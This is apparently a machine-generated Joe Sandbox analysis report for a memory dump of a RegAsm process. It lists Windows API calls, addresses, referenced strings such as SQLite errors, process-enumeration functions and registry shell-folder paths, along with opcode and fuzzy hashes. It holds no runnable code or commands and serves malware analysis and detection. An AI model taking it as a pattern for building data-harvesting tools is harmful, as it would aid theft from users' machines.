                                                                        • memset.MSVCRT ref: 00408377
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 290601579-0
                                                                        • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                        • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                        • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                        • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$wcslen
                                                                        • String ID:
                                                                        • API String ID: 239872665-3916222277
                                                                        • Opcode ID: 6d2ace926fa1fd4fd0b6115da4c515e06a5da4cfb6d7fd53cc3c25480c37732e
                                                                        • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                        • Opcode Fuzzy Hash: 6d2ace926fa1fd4fd0b6115da4c515e06a5da4cfb6d7fd53cc3c25480c37732e
                                                                        • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                        • String ID: %s (%s)$YV@
                                                                        • API String ID: 3979103747-598926743
                                                                        • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                        • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                        • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                        • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                        • wcslen.MSVCRT ref: 0040A6B1
                                                                        • wcscpy.MSVCRT ref: 0040A6C1
                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                        • wcscpy.MSVCRT ref: 0040A6DB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                        • String ID: Unknown Error$netmsg.dll
                                                                        • API String ID: 2767993716-572158859
                                                                        • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                        • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                        • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                        • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                        APIs
                                                                        Strings
                                                                        • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                        • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                        • database is already attached, xrefs: 0042F721
                                                                        • unable to open database: %s, xrefs: 0042F84E
                                                                        • out of memory, xrefs: 0042F865
                                                                        • database %s is already in use, xrefs: 0042F6C5
                                                                        • too many attached databases - max %d, xrefs: 0042F64D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                        • API String ID: 1297977491-2001300268
                                                                        • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                        • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                        • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                        • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                        APIs
                                                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                        • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                        • GetLastError.KERNEL32 ref: 004178FB
                                                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$ErrorLastLockSleepUnlock
                                                                        • String ID:
                                                                        • API String ID: 3015003838-0
                                                                        • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                        • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                        • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                        • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                        • wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                        • wcslen.MSVCRT ref: 0040D1D3
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                        • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                        • memcpy.MSVCRT ref: 0040D24C
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                        • String ID: strings
                                                                        • API String ID: 3166385802-3030018805
                                                                        • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                        • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                        • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                        • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040D8BD
                                                                        • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                        • memset.MSVCRT ref: 0040D906
                                                                        • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                        • _wcsicmp.MSVCRT ref: 0040D92F
                                                                          • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                          • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                        • String ID: sysdatetimepick32
                                                                        • API String ID: 1028950076-4169760276
                                                                        • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                        • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                        • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                        • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Library$FreeLoadMessage
                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                        • API String ID: 3897320386-317687271
                                                                        • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                        • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                        • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                        • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                        APIs
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                        • API String ID: 4271163124-70141382
                                                                        • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                        • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                        • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                        • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                        • API String ID: 4139908857-3953557276
                                                                        • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                        • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                        • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                        • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memset
                                                                        • String ID: -journal$-wal
                                                                        • API String ID: 438689982-2894717839
                                                                        • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                        • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                        • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                        • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                        • String ID:
                                                                        • API String ID: 4218492932-0
                                                                        • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                        • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                        • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                        • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                        APIs
                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                        • memcpy.MSVCRT ref: 0044A8BF
                                                                        • memcpy.MSVCRT ref: 0044A90C
                                                                        • memcpy.MSVCRT ref: 0044A988
                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                        • memcpy.MSVCRT ref: 0044A9D8
                                                                        • memcpy.MSVCRT ref: 0044AA19
                                                                        • memcpy.MSVCRT ref: 0044AA4A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memset
                                                                        • String ID: gj
                                                                        • API String ID: 438689982-4203073231
                                                                        • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                        • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                        • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                        • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                        • String ID: 0$6
                                                                        • API String ID: 2029023288-3849865405
                                                                        • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                        • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                        • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                        • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                        APIs
                                                                          • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                        • memset.MSVCRT ref: 00405455
                                                                        • memset.MSVCRT ref: 0040546C
                                                                        • memset.MSVCRT ref: 00405483
                                                                        • memcpy.MSVCRT ref: 00405498
                                                                        • memcpy.MSVCRT ref: 004054AD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$memcpy$ErrorLast
                                                                        • String ID: 6$\
                                                                        • API String ID: 404372293-1284684873
                                                                        • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                        • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                        • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                        • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                        • GetLastError.KERNEL32 ref: 0041855C
                                                                        • Sleep.KERNEL32(00000064), ref: 00418571
                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                        • GetLastError.KERNEL32 ref: 0041858E
                                                                        • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesErrorFileLastSleep$??3@
                                                                        • String ID:
                                                                        • API String ID: 1040972850-0
                                                                        • Opcode ID: 50043058a1b5c1adbd70e35514f2ed55e6e14a886e8aa5764a6ab2805656462d
                                                                        • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                        • Opcode Fuzzy Hash: 50043058a1b5c1adbd70e35514f2ed55e6e14a886e8aa5764a6ab2805656462d
                                                                        • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                        APIs
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                        • wcscpy.MSVCRT ref: 0040A0D9
                                                                        • wcscat.MSVCRT ref: 0040A0E6
                                                                        • wcscat.MSVCRT ref: 0040A0F5
                                                                        • wcscpy.MSVCRT ref: 0040A107
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                        • String ID:
                                                                        • API String ID: 1331804452-0
                                                                        • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                        • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                        • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                        • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                        Strings
                                                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                        • <%s>, xrefs: 004100A6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf
                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                        • API String ID: 3473751417-2880344631
                                                                        • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                        • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                        • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                        • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscat$_snwprintfmemset
                                                                        • String ID: %2.2X
                                                                        • API String ID: 2521778956-791839006
                                                                        • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                        • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                        • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                        • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintfwcscpy
                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                        • API String ID: 999028693-502967061
                                                                        • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                        • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                        • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                        • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                        APIs
                                                                          • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                          • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                          • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                          • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                        • memset.MSVCRT ref: 0040C439
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                        • _wcsupr.MSVCRT ref: 0040C481
                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                        • memset.MSVCRT ref: 0040C4D0
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                        • String ID:
                                                                        • API String ID: 1973883786-0
                                                                        • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                        • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                        • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                        • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004116FF
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                          • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
